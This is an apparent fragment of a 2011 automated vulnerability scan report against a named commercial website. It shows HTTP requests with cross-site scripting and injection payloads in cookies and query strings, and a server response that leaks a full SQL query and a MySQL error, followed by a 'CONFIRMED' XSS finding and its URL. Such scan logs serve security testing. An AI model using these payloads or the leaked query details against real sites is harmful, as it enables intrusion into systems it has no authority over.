OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nas9u8dk8gd7kbcol4ichotvc6; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00054C)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/

/ppc/leadflow/wede00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/?'"--></style></script><script>alert(0x000557)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000557)</script>

Request